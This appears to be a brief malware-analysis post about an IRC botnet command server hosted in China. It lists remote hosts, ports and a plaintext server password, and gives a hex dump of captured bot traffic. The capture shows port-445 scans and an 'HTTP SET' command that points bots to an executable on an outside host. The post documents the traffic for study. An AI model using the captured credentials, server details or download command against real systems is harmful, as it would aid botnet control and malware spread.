221.206.88.193(botnet hosted in China Harbin China Unicom Heilongjiang Province Network)

Remote Host Port Number
112.78.112.208 80
218.85.133.201 80
221.206.88.193 7196 PASS laorosr

MODE [N00_USA_XP_9442229]
@ -ix

00000000 | 5041 5353 206C 616F 726F 7372 0D0A 5052 | PASS laorosr..PR
00000010 | 5256 4D53 4720 5B4E 3030 5F55 5341 5F58 | RVMSG [N00_USA_X
00000020 | 505F 3934 3432 BCB9 4020 3A20 5261 6E64 | P_9442..@ : Rand
00000030 | 6F6D 2050 6F72 7420 5363 616E 2073 7461 | om Port Scan sta
00000040 | 7274 6564 206F 6E20 3139 322E 782E 782E | rted on 192.x.x.
00000050 | 783A 3434 3520 7769 7468 2061 2064 656C | x:445 with a del
00000060 | 6179 206F 6620 3520 7365 636F 6E64 7320 | ay of 5 seconds
00000070 | 666F 7220 3020 6D69 6E75 7465 7320 7573 | for 0 minutes us
00000080 | 696E 6720 3235 2074 6872 6561 6473 2E0D | ing 25 threads..
00000090 | 0A50 5252 564D 5347 205B 4E30 305F 5553 | .PRRVMSG [N00_US
000000A0 | 415F 5850 5F39 3434 32BC B940 203A 2054 | A_XP_9442..@ : T
000000B0 | 7279 696E 6720 746F 2067 6574 2065 7874 | rying to get ext
000000C0 | 6572 6E61 6C20 4950 2E0D 0A50 5252 564D | ernal IP…PRRVM
000000D0 | 5347 205B 4E30 305F 5553 415F 5850 5F39 | SG [N00_USA_XP_9
000000E0 | 3434 32BC B940 203A 2052 616E 646F 6D20 | 442..@ : Random
000000F0 | 506F 7274 2053 6361 6E20 7374 6172 7465 | Port Scan starte
00000100 | 6420 6F6E 2031 3932 2E31 3638 2E78 2E78 | d on 192.168.x.x
00000110 | 3A34 3435 2077 6974 6820 6120 6465 6C61 | :445 with a dela
00000120 | 7920 6F66 2035 2073 6563 6F6E 6473 2066 | y of 5 seconds f
00000130 | 6F72 2030 206D 696E 7574 6573 2075 7369 | or 0 minutes usi
00000140 | 6E67 2032 3520 7468 7265 6164 732E 0D0A | ng 25 threads…
00000150 | 5052 5256 4D53 4720 5B4E 3030 5F55 5341 | PRRVMSG [N00_USA
00000160 | 5F58 505F 3934 3432 BCB9 4020 3A20 5365 | _XP_9442..@ : Se
00000170 | 7175 656E 7469 616C 2050 6F72 7420 5363 | quential Port Sc
00000180 | 616E 2073 7461 7274 6564 206F 6E20 3139 | an started on 19
00000190 | 322E 3136 382E 302E 303A 3434 3520 7769 | 2.168.0.0:445 wi
000001A0 | 7468 2061 2064 656C 6179 206F 6620 3520 | th a delay of 5
000001B0 | 7365 636F 6E64 7320 666F 7220 3020 6D69 | seconds for 0 mi
000001C0 | 6E75 7465 7320 7573 696E 6720 3230 2074 | nutes using 20 t
000001D0 | 6872 6561 6473 2E0D 0A50 5252 564D 5347 | hreads…PRRVMSG
000001E0 | 205B 4E30 305F 5553 415F 5850 5F39 3434 | [N00_USA_XP_944
000001F0 | 32BC B940 203A 2053 6571 7565 6E74 6961 | 2..@ : Sequentia
00000200 | 6C20 506F 7274 2053 6361 6E20 7374 6172 | l Port Scan star
00000210 | 7465 6420 6F6E 2031 3932 2E31 3638 2E32 | ted on 192.168.2
00000220 | 3237 2E30 3A34 3435 2077 6974 6820 6120 | 27.0:445 with a
00000230 | 6465 6C61 7920 6F66 2035 2073 6563 6F6E | delay of 5 secon
00000240 | 6473 2066 6F72 2030 206D 696E 7574 6573 | ds for 0 minutes
00000250 | 2075 7369 6E67 2032 3020 7468 7265 6164 | using 20 thread
00000260 | 732E 0D0A 5052 5256 4D53 4720 5B4E 3030 | s…PRRVMSG [N00
00000270 | 5F55 5341 5F58 505F 3934 3432 BCB9 4020 | _USA_XP_9442..@
00000280 | 3A20 5365 7175 656E 7469 616C 2050 6F72 | : Sequential Por
00000290 | 7420 5363 616E 2073 7461 7274 6564 206F | t Scan started o
000002A0 | 6E20 3139 322E 302E 302E 303A 3434 3520 | n 192.0.0.0:445
000002B0 | 7769 7468 2061 2064 656C 6179 206F 6620 | with a delay of
000002C0 | 3520 7365 636F 6E64 7320 666F 7220 3020 | 5 seconds for 0
000002D0 | 6D69 6E75 7465 7320 7573 696E 6720 3130 | minutes using 10
000002E0 | 2074 6872 6561 6473 2E0D 0A4B 4349 4B20 | threads…KCIK
000002F0 | 5B4E 3030 5F55 5341 5F58 505F 3934 3432 | [N00_USA_XP_9442
00000300 | 3232 395D 18E7 400D 0A72 7373 7220 5350 | 229]..@..rssr SP
00000310 | 322D 3231 3720 2A20 3020 3A43 4F4D 5055 | 2-217 * 0 :COMPU
00000320 | 5445 524E 414D 450D 0A73 656E 6420 2321 | TERNAME..send #!
00000330 | 2C23 4D61 206F 6F6F 6F0D 0A50 5252 564D | ,#Ma oooo..PRRVM
00000340 | 5347 2023 6920 3A48 5454 5020 5345 5420 | SG #i :HTTP SET
00000350 | 6874 7470 3A2F 2F34 362E 3136 312E 3231 | http://46.161.21
00000360 | 2E34 2F67 2E65 7865 0D0A 5052 5256 4D53 | .4/g.exe..PRRVMS
00000370 | 4720 5B4E 3030 5F55 5341 5F58 505F 3934 | G [N00_USA_XP_94
00000380 | 3432 BCB9 4020 3A20 5472 7969 6E67 2074 | 42..@ : Trying t
00000390 | 6F20 6765 7420 6578 7465 726E 616C 2049 | o get external I
000003A0 | 502E 0D0A | P…

infos about hosting:
http://whois.domaintools.com/221.206.88.193

Categories: Uncategorized